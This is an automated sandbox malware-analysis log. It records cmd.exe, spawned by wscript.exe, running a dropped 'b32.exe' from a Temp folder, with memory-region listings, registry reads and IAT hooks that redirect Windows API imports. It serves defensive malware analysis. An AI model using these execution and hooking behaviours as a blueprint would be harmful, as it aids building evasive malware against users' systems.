Command Line "C:\Windows\System32\cmd.exe" /c b32.exe
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:00:41, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:01:43
OS Process Information
Information Value
PID 0xab8
Parent PID 0xa84 (c:\windows\syswow64\wscript.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xABC
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True False False -
private_0x00000000000a0000 0x000a0000 0x0011ffff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x0029ffff Private Memory Readable, Writable True False False -
private_0x00000000002f0000 0x002f0000 0x003effff Private Memory Readable, Writable True False False -
locale.nls 0x003f0000 0x00456fff Memory Mapped File Readable False False False -
pagefile_0x0000000000460000 0x00460000 0x005e7fff Pagefile Backed Memory Readable True False False -
private_0x0000000000650000 0x00650000 0x0065ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000660000 0x00660000 0x007e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007f0000 0x007f0000 0x01beffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001bf0000 0x01bf0000 0x01f32fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01f40000 0x0220efff Memory Mapped File Readable False False False -
cmd.exe 0x4a9a0000 0x4a9ebfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75430000 0x75436fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xabc
56 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-05-11 13:20:41 (UTC) True 1
Fn
System Get Time type = Ticks, time = 104380 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a9a0000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ffa84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x76003b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75fe4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75ffa79d True 1
Fn
File Get Info filename = b32.exe, type = file_attributes True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, os_pid = 0xad4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #6: b32.exe
9868 35
Information Value
ID #6
File Name c:\users\5p5nrg~1\appdata\local\temp\b32.exe
Command Line b32.exe
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:00:41, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:01:43
OS Process Information
Information Value
PID 0xad4
Parent PID 0xab8 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xAD8
0xAEC
0xAFC
0xB1C
0xB20
0xB24
0xB28
0xB2C
0xB30
0xB34
0xB38
0xB3C
0xB40
0xBB0
0x808
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000050000 0x00050000 0x00050fff Private Memory Readable, Writable True False False -
private_0x0000000000050000 0x00050000 0x0005ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000060000 0x00060000 0x00067fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000070000 0x00070000 0x00070fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x00160fff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x0017ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00177fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000180000 0x00180000 0x00187fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
pagefile_0x0000000000210000 0x00210000 0x00211fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000210000 0x00210000 0x00216fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000220000 0x00220000 0x00221fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000230000 0x00230000 0x002affff Private Memory Readable, Writable True False False -
private_0x00000000002b0000 0x002b0000 0x002d6fff Private Memory Readable, Writable True False False -
msctf.dll.mui 0x002b0000 0x002b0fff Memory Mapped File Readable, Writable False False False -
pagefile_0x00000000002c0000 0x002c0000 0x002c1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002d0000 0x002d0000 0x002d0fff Pagefile Backed Memory Readable True False False -
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory Readable, Writable True False False -
pagefile_0x00000000002f0000 0x002f0000 0x003cefff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003d1fff Pagefile Backed Memory Readable True False False -
private_0x00000000003d0000 0x003d0000 0x003e6fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True False False -
b32.exe 0x00400000 0x0a9bafff Memory Mapped File Readable, Writable, Executable True False False -
private_0x000000000a9c0000 0x0a9c0000 0x0a9fffff Private Memory Readable, Writable True False False -
private_0x000000000aa00000 0x0aa00000 0x0aa3ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x0aa00000 0x0aa3bfff Memory Mapped File Readable False False False -
private_0x000000000aa00000 0x0aa00000 0x0aa00fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x000000000aa00000 0x0aa00000 0x0aa4ffff Pagefile Backed Memory Readable, Writable True False False -
windowsshell.manifest 0x0aa00000 0x0aa00fff Memory Mapped File Readable False False False -
index.dat 0x0aa00000 0x0aa0ffff Memory Mapped File Readable, Writable True False False -
pagefile_0x000000000aa10000 0x0aa10000 0x0aa11fff Pagefile Backed Memory Readable True False False -
index.dat 0x0aa20000 0x0aa27fff Memory Mapped File Readable, Writable True False False -
index.dat 0x0aa30000 0x0aa3ffff Memory Mapped File Readable, Writable True False False -
private_0x000000000aa40000 0x0aa40000 0x0aa42fff Private Memory Readable, Writable, Executable True False False -
private_0x000000000aa50000 0x0aa50000 0x0ab4ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ab50000 0x0ab50000 0x0acd7fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ace0000 0x0ace0000 0x0ae60fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ae70000 0x0ae70000 0x0c26ffff Pagefile Backed Memory Readable True False False -
private_0x000000000c270000 0x0c270000 0x0c3affff Private Memory Readable, Writable True False False -
private_0x000000000c270000 0x0c270000 0x0c36ffff Private Memory Readable, Writable True False False -
private_0x000000000c370000 0x0c370000 0x0c3affff Private Memory Readable, Writable True False False -
private_0x000000000c3b0000 0x0c3b0000 0x0c56ffff Private Memory Readable, Writable True False False -
private_0x000000000c3b0000 0x0c3b0000 0x0c4affff Private Memory Readable, Writable True False False -
private_0x000000000c4b0000 0x0c4b0000 0x0c52ffff Private Memory Readable, Writable True False False -
private_0x000000000c530000 0x0c530000 0x0c530fff Private Memory Readable, Writable, Executable True False False -
private_0x000000000c530000 0x0c530000 0x0c532fff Private Memory Readable, Writable, Executable True False False -
private_0x000000000c540000 0x0c540000 0x0c540fff Private Memory Readable, Writable True False False -
private_0x000000000c560000 0x0c560000 0x0c56ffff Private Memory Readable, Writable True False False -
private_0x000000000c570000 0x0c570000 0x0c66ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x0c670000 0x0c93efff Memory Mapped File Readable False False False -
pagefile_0x000000000c940000 0x0c940000 0x0cd32fff Pagefile Backed Memory Readable True False False -
private_0x000000000cd40000 0x0cd40000 0x0cddffff Private Memory Readable, Writable True False False -
private_0x000000000cd40000 0x0cd40000 0x0cd7ffff Private Memory Readable, Writable True False False -
private_0x000000000cda0000 0x0cda0000 0x0cddffff Private Memory Readable, Writable True False False -
private_0x000000000cde0000 0x0cde0000 0x0ce4ffff Private Memory Readable, Writable True False False -
private_0x000000000ce50000 0x0ce50000 0x0cf4ffff Private Memory Readable, Writable True False False -
private_0x000000000cf50000 0x0cf50000 0x0cf8ffff Private Memory Readable, Writable True False False -
private_0x000000000cf90000 0x0cf90000 0x0d08ffff Private Memory Readable, Writable True False False -
private_0x000000000d090000 0x0d090000 0x0d0cffff Private Memory Readable, Writable True False False -
private_0x000000000d0d0000 0x0d0d0000 0x0d1cffff Private Memory Readable, Writable True False False -
private_0x000000000d1d0000 0x0d1d0000 0x0d20ffff Private Memory Readable, Writable True False False -
private_0x000000000d210000 0x0d210000 0x0d30ffff Private Memory Readable, Writable True False False -
private_0x000000000d310000 0x0d310000 0x0d40ffff Private Memory Readable, Writable True False False -
pidor.bmp 0x0e940000 0x0ee31fff Memory Mapped File Readable True True False
msvcr100.dll 0x71060000 0x7111efff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74f00000 0x74f51fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74f70000 0x74faafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74fb0000 0x74fc5fff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x74fd0000 0x74fdcfff Memory Mapped File Readable, Writable, Executable False False False -
rasman.dll 0x74fe0000 0x74ff4fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75040000 0x75046fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x75050000 0x7506bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75070000 0x750b3fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x750c0000 0x750cafff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x750d0000 0x7526dfff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x752b0000 0x752c2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x752d0000 0x7534ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75a20000 0x75a24fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75a50000 0x75a55fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75a60000 0x75b7cfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x75dd0000 0x75fcafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76180000 0x761d6fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x76240000 0x76375fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76380000 0x763b4fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x763d0000 0x763dbfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x764e0000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76570000 0x76664fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76890000 0x76912fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76920000 0x77569fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x77e00000 0x77e02fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 176 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
Type Installer Target Size Information Actions
IAT private_0x000000000aa50000:+0x14e7c 3. entry of b32.exe 4 bytes gdi32.dll:SetMapMode+0x0 now points to b32.exe:+0x93b1333
IAT private_0x000000000aa50000:+0x14e7c 6. entry of b32.exe 4 bytes kernel32.dll:GetTapePosition+0x0 now points to private_0x000000007fff0000:+0x4a7e4c1
IAT private_0x000000000aa50000:+0x14e7c 7. entry of b32.exe 4 bytes kernel32.dll:lstrlenW+0x0 now points to private_0x000000007fff0000:+0x1eae77d5
IAT private_0x000000000aa50000:+0x14e7c 8. entry of b32.exe 4 bytes kernel32.dll:LoadLibraryA+0x0 now points to private_0x000000007fff0000:+0x6c5cfa51
IAT private_0x000000000aa50000:+0x14e7c 10. entry of b32.exe 4 bytes kernel32.dll:GetThreadPriority+0x0 now points to private_0x000000007fff0000:+0x1ee40e13
IAT private_0x000000000aa50000:+0x14e7c 13. entry of b32.exe 4 bytes kernel32.dll:CreateFileW+0x0 now points to private_0x000000007fff0000:+0x7a00550e
IAT private_0x000000000aa50000:+0x14e7c 14. entry of b32.exe 4 bytes kernel32.dll:FlushFileBuffers+0x0 now points to b32.exe:+0x345dd80
IAT private_0x000000000aa50000:+0x14e7c 15. entry of b32.exe 4 bytes kernel32.dll:WriteConsoleW+0x0 now points to b32.exe:+0x93f133d
IAT private_0x000000000aa50000:+0x14e7c 17. entry of b32.exe 4 bytes kernel32.dll:OutputDebugStringW+0x0 now points to b32.exe:+0x237212f
IAT private_0x000000000aa50000:+0x14e7c 19. entry of b32.exe 4 bytes kernel32.dll:SetFilePointerEx+0x0 now points to private_0x000000007fff0000:+0x55f87feb
IAT private_0x000000000aa50000:+0x14e7c 21. entry of b32.exe 4 bytes kernel32.dll:lstrlenA+0x0 now points to b32.exe:+0x3d3bc6b
IAT private_0x000000000aa50000:+0x14e7c 22. entry of b32.exe 4 bytes kernel32.dll:WaitForSingleObject+0x0 now points to private_0x000000007fff0000:+0x4495555
IAT private_0x000000000aa50000:+0x14e7c 23. entry of b32.exe 4 bytes kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0x4fe15ce7
IAT private_0x000000000aa50000:+0x14e7c 24. entry of b32.exe 4 bytes kernel32.dll:PulseEvent+0x0 now points to private_0x000000007fff0000:+0x46d9dfc1
IAT private_0x000000000aa50000:+0x14e7c 25. entry of b32.exe 4 bytes kernel32.dll:WideCharToMultiByte+0x0 now points to private_0x000000007fff0000:+0x3ae4985e
IAT private_0x000000000aa50000:+0x14e7c 27. entry of b32.exe 4 bytes ntdll.dll:RtlDecodePointer+0x0 now points to pagefile_0x000000000ae70000:+0x4e97fb
IAT private_0x000000000aa50000:+0x14e7c 28. entry of b32.exe 4 bytes ntdll.dll:RtlEnterCriticalSection+0x0 now points to private_0x000000007fff0000:+0x8555c13
IAT private_0x000000000aa50000:+0x14e7c 33. entry of b32.exe 4 bytes kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x7b97860a
IAT private_0x000000000aa50000:+0x14e7c 38. entry of b32.exe 4 bytes kernel32.dll:RtlUnwind+0x0 now points to private_0x000000007fff0000:+0x64ff9999
IAT private_0x000000000aa50000:+0x14e7c 39. entry of b32.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x3c90f0ec
IAT private_0x000000000aa50000:+0x14e7c 40. entry of b32.exe 4 bytes kernel32.dll:IsProcessorFeaturePresent+0x0 now points to private_0x000000007fff0000:+0x6cf3ecd7
IAT private_0x000000000aa50000:+0x14e7c 41. entry of b32.exe 4 bytes kernel32.dll:UnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x5a90d29f
IAT private_0x000000000aa50000:+0x14e7c 42. entry of b32.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x548b3d7b
IAT private_0x000000000aa50000:+0x14e7c 44. entry of b32.exe 4 bytes kernel32.dll:InitializeCriticalSectionAndSpinCount+0x0 now points to private_0x000000007fff0000:+0x70991b0b
IAT private_0x000000000aa50000:+0x14e7c 45. entry of b32.exe 4 bytes kernel32.dll:Sleep+0x0 now points to b32.exe:+0x1e8e1ba
IAT private_0x000000000aa50000:+0x14e7c 49. entry of b32.exe 4 bytes kernel32.dll:TlsGetValue+0x0 now points to private_0x000000007fff0000:+0x428f1c99
